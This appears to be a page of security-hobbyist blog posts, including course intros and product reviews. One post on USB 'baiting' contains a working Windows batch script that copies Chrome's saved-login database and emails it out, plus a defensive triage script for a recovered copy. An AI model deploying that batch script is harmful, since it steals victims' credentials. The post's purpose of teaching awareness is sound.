Security for Web Developers: 02: What Determines Your Website’s Security?

Security Padlock

Relatively speaking, your site's security is:

  • Higher if you hold little or no financial information, or expose few network resources (you are a less attractive target),
  • Higher if your server is promptly patched and correctly configured,
  • Higher if your code is built to high standards, and
  • Higher if the network connecting your site to the Internet enforces tight permissions.

You can employ formal measurement metrics, like this one from ISACA: http://www.isaca.org/Journal/archives/2011/Volume-4/Pages/Measure-and-Monitor-Application-Security.aspx

Or you can employ an “alternative” methodology like this one from White Hat Security: https://www.whitehatsec.com/blog/if-you-want-to-improve-something-measure-it/

Next: http://schoolforhackers.com/security-web-developers-makes-website-insecure/

Security for Web Developers: 01

Blue Security Goddess

With Glenn Norman

Get a basic understanding of how servers and security play a key role in the overall functioning of websites. This course introduces how a website's content is stored and served, from the basic programming of a site to its design elements, along with ways to keep your website and your users safe in the sometimes dangerous world of the Internet.

Objectives

You will learn to recognize the risk factors your particular web applications face, and how to determine the specific vulnerabilities within your site, app and code.

You will try out some of the web-app security-testing tools that will be used against you. Often these will identify the most obvious vulnerabilities you should address.

Then we will discuss the most common code and configuration issues, as well as plugins and services for monitoring your site.

Next: http://schoolforhackers.com/determines-websites-security/

Well-known Social Engineering Ways

A brilliant engineer would hack out a smart solution to the problem at hand, and consider it a compliment to be called a hacker. For more on this, read the article Hack to live at http://schoolforhackers.com/category/hacking-tools/. The sure thing is that you find a way to get what you want. Of the five well-known social engineering techniques we would like to discuss, let's start with one.

  1. Baiting

               The name "baiting" is a metaphor. The technique is similar to a phishing (fishing) attack; what distinguishes it from other types of social engineering is the items or goods the attacker uses to entice victims. Baiters exploit human curiosity through physical media, for example by offering free audio and movie downloads on a USB stick left where someone will find it.

Race Start

Min Mg Mg put some USB sticks around his roommates' desks and the practical room. One of his roommates picked up a USB stick and, curious, opened it on his laptop. "Wow, lots of audio here, and videos as well; that's real luck. Look, this video is interesting, its name is "Myself"; let's check it out to find out whose USB stick this is," he muttered as he opened the video. "Grandpa, I put in a video file hooked with a barb: a batch file –

@echo off
color 08
rem Stage the bundled mailer in the victim's Documents folder and put it on PATH
mkdir C:\Users\%username%\Documents\sm
move /Y sendEmail.exe C:\Users\%username%\Documents\sm
PATH=%path%;C:\Users\%username%\Documents\sm
rem Copy Chrome's saved-password database (an SQLite file) out of the profile
cd %appdata%\..\Local\Google\Chrome\"User Data"\Default\
xcopy "Login Data" C:\Users\%username%\Documents /S /D /Y /Q /H /C
cd C:\Users\%username%\Documents\
copy /Y "Login Data" LoginData
cd C:\Users\%username%\Documents\sm\
rem Mail the copy out through Gmail's SMTP relay with hard-coded credentials
sendEmail -f from@gmail.com -u subject -m "Message Body" -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes
rem Show the victim a harmless animation as a distraction
start http://www.animateit.net/data/media/feb2013/love_roses_03.gif


with this playful Windows script, and it's converted to an exe using a bat-to-exe converter. I bound it with a video file and sendEmail.exe. Soon I might have the Login Data file from his Google Chrome. When I put the Login Data into my Chrome profile I'll see his saved passwords, if he saved his passwords in his browser," Min Mg Mg said to grandpa while staring at his screen.

Race End            

Of course, you should not let curiosity get the better of you just because you found a USB stick on the street. Keep in mind that there are attackers out there running this attack on purpose, even if the script above is an amateur Windows script. One caveat on the script's claim: Chrome on Windows encrypts the password column of Login Data with DPAPI under the victim's own Windows account, so dropping the copied file into another profile does not reveal the passwords by itself; what the attacker captures directly is the list of sites and usernames, which is damaging enough for targeted follow-up attacks.
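As an added example that is not part of the original post: the stolen file is an ordinary SQLite database, so a defender who recovers a copy (from the mailbox it was sent to, the staging folder, or a forensic image) can triage what was exposed with nothing but Python's standard library. The table name `logins` and the columns `origin_url`, `username_value` and `password_value` are Chrome's real ones; the sample database, the site names and the blob contents are constructed here, and the classifier recognises only the DPAPI blob header and Chrome's "v10" AES-GCM prefix, which is an assumption about which Chrome versions produced the file.

```python
"""Triage a copied Chrome "Login Data" file (an SQLite database).

Added example, not code from the original post. It relies only on the
public layout of Chrome's password store: a `logins` table whose
`password_value` column holds a blob that Chrome on Windows protects
with DPAPI (older versions) or with AES-GCM under a DPAPI-wrapped key
(values prefixed "v10"). The sample database below is constructed.
"""
import os
import sqlite3
import tempfile

DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf")  # CryptProtectData blob header
CHROME_V10_PREFIX = b"v10"                        # AES-GCM, key wrapped by DPAPI


def classify_password_blob(blob: bytes) -> str:
    """Say what protects a password_value; 'plaintext' means exposed as-is."""
    if not blob:
        return "empty"
    if blob.startswith(DPAPI_MAGIC):
        return "dpapi"
    if blob.startswith(CHROME_V10_PREFIX):
        return "v10-aesgcm"
    try:
        blob.decode("ascii")
        return "plaintext"
    except UnicodeDecodeError:
        return "unknown"


def list_logins(db_path: str) -> list:
    """Return (origin_url, username, protection) for every saved login.

    Chrome keeps the live file locked, so both attacker and analyst work on
    a copy; this function never writes to the database it opens.
    """
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute(
            "SELECT origin_url, username_value, password_value "
            "FROM logins ORDER BY rowid"
        ).fetchall()
    finally:
        con.close()
    return [(url, user, classify_password_blob(bytes(pw))) for url, user, pw in rows]


def build_sample_login_data(db_path: str) -> None:
    """Constructed sample: a minimal `logins` table with three kinds of entries."""
    con = sqlite3.connect(db_path)
    con.execute(
        "CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)"
    )
    con.executemany(
        "INSERT INTO logins VALUES (?, ?, ?)",
        [
            # DPAPI-protected entry, as an older Chrome on Windows writes it
            ("https://mail.example.test/", "alice", DPAPI_MAGIC + b"\x00" * 32),
            # Newer Chrome: "v10" + 12-byte nonce + ciphertext + 16-byte tag
            ("https://shop.example.test/", "alice", CHROME_V10_PREFIX + b"\x11" * 28),
            # A value stored unprotected (e.g. an import from another browser)
            ("http://legacy.example.test/", "bob", b"hunter2"),
        ],
    )
    con.commit()
    con.close()


def triage_sample() -> list:
    """Build the constructed sample file, triage it, and clean up."""
    fd, path = tempfile.mkstemp(suffix="-LoginData.db")
    os.close(fd)
    os.unlink(path)  # sqlite3 creates the file itself
    try:
        build_sample_login_data(path)
        return list_logins(path)
    finally:
        if os.path.exists(path):
            os.unlink(path)


if __name__ == "__main__":
    for url, user, protection in triage_sample():
        print(f"{url:32} {user:8} {protection}")
```

Run against a real copy with `list_logins(r"C:\path\to\Login Data")` on the analyst's machine. Every row is an account the attacker now knows exists; rows classified as plaintext are credentials that should be treated as burned immediately, while the DPAPI and v10 rows are only recoverable to someone who can run code in the victim's Windows session.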


Get Certified! Pearson’s A+ Video Courses: A Serious Alternative to Classroom Training

Glenn Norman

Video training has become a really big business. I’m a classroom teacher myself, and teach the A+ certification and several others, so the question of whether video training can replace classroom time is pretty personal, and I come at it a little skeptically. I’ve endured some truly painful online and video training courses, and I’m betting my gentle reader has too. Do they have to be awful? Or can they truly be good enough to replace “live” teachers? And more important, are they a good bargain relative to live classes?

No, they don’t have to be awful. Some are definitely better than others. Twenty years ago the user interfaces were mish-mashes, a situation that has hugely improved. Today they’ve almost all settled toward uniform layouts, which honestly improves the user experience across the board. It’s great to have a course outline with links to lessons down one side of the workspace or the other, for instance. Live classes often have a separate area for text material and another column for chat. Sometimes there’s a panel for downloadable materials, and sometimes all of these are wrapped up in one tabbed column (my favorite). What really matters is, which of these elements are included in a given course? And far more critical, how good is the actual presentation material?

In this case the material is quite good. The video pane alternates between PowerPoint-like slides, detailed video close-ups of hardware and actual assembly, and the presenter (who I presume is David Prowse himself) talking and using a white board. This last is kind of classroom-like, complete with quick-and-dirty sketches. David has a good physical presence and a good speaking voice, so it works well. The frequent change of visual layout keeps things interesting, which is critical for recorded trainings. And the level of detail is really quite good; at 20+ hours for the 901 video course and 40+ for both 901 and 902, it’s close to the number of hours most live classes will run. That’s a lot of material, but in small chunks running about five minutes each. This is a popular format length these days: most students like being able to “drop in” to the course when they have some free time without making an hour-long commitment. Plus, it’s not so painful if you have to repeat a lecture. Personally, I find myself reluctant to start hour-long lessons online, but I can devour a five-minute video almost any time.

Lessons consist of Learning Objectives, lectures, Performance Based Exercises (very much like the ones you’ll find on the actual test) and PC Build demonstrations. The Learning Objectives aren’t a boring list of topics; instead, David gives a brief but much more informative talk about the lesson. Some Performance Based Exercises are classic drag-and-drop matching tasks, but some require you to demonstrate actual familiarity with Windows by, for instance, setting a static IP address, which is a highly relevant skill. The overall high-quality video production really shines in the PC Build walkthroughs, though these may be most useful for less experienced students. Modules are collections of Lessons, and include Module Quizzes (again, very similar to actual test questions). Most textbooks in this area include at least a couple of sample tests, whether on CD or by download. With this package you get a series of Module Quizzes, which as I’ve mentioned are pretty good, but you don’t get formal timed sample exams.

Can really hi-res video of motherboards and RAM and video cards replace the hands-on, pass-it-around of a live class? Put simply, yes, provided you’re already familiar with these things. But no, not if you’ve never handled them. How should you hold a stick of RAM? What part(s) should you never touch? If you picked up a module in a job interview would you be comfortable holding it? If these questions just make you laugh, you’re a good candidate for this course.

There were a couple of things I missed in the user interface package. There are no Supplementary Materials, which is a pretty small issue in a really complete package like this one, though I’ve run into some really valuable supplementary handouts from time to time. But the lack of student-teacher interaction might be a more serious issue. This is obviously the primary benefit of a live classroom or online class: you can say, Wait, I’m stuck on this, or I can’t make that work, or Mine doesn’t look like that. I’ve seen the chat window fill with questions, and I’ve found some of the most valuable material there when an instructor is provoked to a deeper explanation.

Some of the online course platforms use a hybrid method, where the course is recorded but the chat function is always available (and teachers are expected to respond to inquiries, even months or years later). Given the model of this video courseware, that’s not practical here. But this lack does take the course another big step away from the live classroom.

What really matters here is, can you take this video course and pass the A+ exam? There’s never a certain answer to that, because so much depends on the experience you bring. Some people are really successful at passing certification tests simply by reading a book or two; those people usually are already familiar with the topic and have advanced study skills. Most of us need more. If you can’t take a classroom course where you live, a video course is a very good alternative, at least if the course itself is high-quality, though I’d recommend spending some serious hands-on time with real hardware. The past few years have seen courses like this one dramatically improve, and at this point they’re certainly a viable alternative, especially if you’re relatively disciplined about your study – and like learning from videos rather than books.

Now for brass tacks: you can take two live courses for the 901 and 902 tests, with textbooks and test vouchers included, for about $2000 depending on your area. These two video courses list as a $499 package as I write this, much more expensive than a textbook and not including the tests, which will run you another $450. You could buy a text and some sample tests and spend barely more than half the price of classroom courses. If you’ve already got some experience with PCs, this could be a real steal for you.

Pearson IT Certification CompTIA A+ 220-901 Complete Video Course – January 22, 2016

By David L. Prowse

ISBN-13: 978-0-13-449930-7 / ISBN-10: 0-13-449930-1

Also see

Pearson IT Certification’s CompTIA A+ 220-901 and 220-902 Complete Video Course Library – April 18, 2016

Tech and Gamer Gear Galore: Massdrop

Daniel Clarke

Massdrop (www.massdrop.com) is a group-buy website located out of New Jersey where people commit to buying a product. Once enough people commit to buying the product, the price begins to drop. After the drop has ended, Massdrop places an order with the manufacturer. Massdrop has several different “communities” that it uses to list similar products together. A few of these communities include: Everyday Carry for knives and useful tools that you can keep in your pocket, Audiophile to suit your listening needs, and Tech for gadgets like a Raspberry Pi or other devices. Those are just a few of the (currently) 13 communities that Massdrop has to offer.

As an example, we’ll look at the DXRacer OH/IS11 Iron Series Chair. The drop can be located at https://www.massdrop.com/buy/dxracer-oh-is11-iron-series-chair. You’ll need to authenticate with Facebook or create an account using an email address; we suggest anonymizing services like Mailinator.com.

Each product has different requirements for the total number of people needed in order to get the discounted price. When the chair first “dropped” or came available for purchase, it was listed for $399.99. As more people purchase the chair, the price drops by $10 with every five people until it reaches the lowest price available of $369.99.

Stages of a Drop
Gamer chairs!

If you are interested in the product but only want it if it reaches the maximum discount, you can commit to buy the product at the lowest price. To compare the requirements for purchase, we will look at some GMK QMX-Clip Sound Dampening Brackets (located at https://www.massdrop.com/buy/gmk-sound-dampening-brackets).

Stages of a Drop: 2

These brackets are used to dampen the sound coming from a mechanical keyboard and are much cheaper than the chair. In order for it to be cost effective for both Massdrop and GMK, more people need to purchase the clips in order to justify a group-buy discount. In this case, at least 50 people are needed to get a discount with 100 people needed to reach the maximum discount.

Now, before you rush onto the site and place a bunch of orders, there are a few issues to understand about Massdrop.

One major complaint is the amount of time that it takes to receive a package. For example, I ordered a wicked set of keycaps on September 30, 2015 (https://www.massdrop.com/buy/danger-zone-sa-keycap-set). The keycaps (I know, they’re badass, huh?) didn’t arrive until February 17, 2016. Four and a half months is almost unheard of to wait for a product to reach you, especially when Amazon Prime will ship me something in 2 days. One reason is that it was a custom set of keycaps that was made specifically for those who purchased it from Massdrop. The other reason is that your order doesn’t drop ship directly to your door. The manufacturer sends the entire order to Massdrop, which then sorts the order and ships it to the customer. I have since purchased other products from Massdrop and both of those orders took about three weeks.

Another major complaint that I have seen, especially recently, is that for products that are not custom made (think knives, chairs, headphones, etc.) it is possible to find the exact same or very similar product for the same price (give or take $5-10) on a major online retailer like Amazon or eBay. In that case, is it worth a few dollars extra to have your product within a week, or are you ok waiting significantly longer to receive it from Massdrop?

Nevertheless, I have used and will continue to use Massdrop.com and watch for new drops that happen daily. If I feel that it is a good deal, I will do my research to make sure that I cannot find the same product for cheaper elsewhere, and if I can’t, I will buy from Massdrop. As a price-conscious consumer, it would be unwise to do differently. As a techie, how can I help myself?

[Daniel Clark is an up-and-coming IT and security consultant in Albuquerque, NM, USA. This is his first contribution to School for Hackers, with more articles on technology and related goodies to come.]

Hacking advice from the article “How to avoid getting hacked, according to expert hackers”

Backlit keyboard

Television host Kevin Roose asked exactly this question, and found out the answer. Because he wanted to investigate how people get hacked, he decided to invite some well-known hackers to hack him personally. And hack him they did: they cracked everything they could reach, from his webcam (a photo every two minutes) to his online accounts. Personally, I would not do this. Doing so puts too much emphasis on hacking skill and on how people get hacked; what deserves the emphasis is what not to do.

Some of the fixes he proposes are familiar, such as using a password manager, which can be a double-edged sword if handled badly. The rest were new to me. Have you heard of an app called Little Snitch? It watches your outgoing traffic for suspicious activity. (Why is my computer sending my credit card statements to China?)

And some of the “answers” can end up helping intruders while users are trying to protect themselves, using a VPN, for instance. You will hear more from me on this subject. For now, would-be crackers, hackers and security professionals, please read the article. (Image courtesy of User: Colin at wikimedia.org)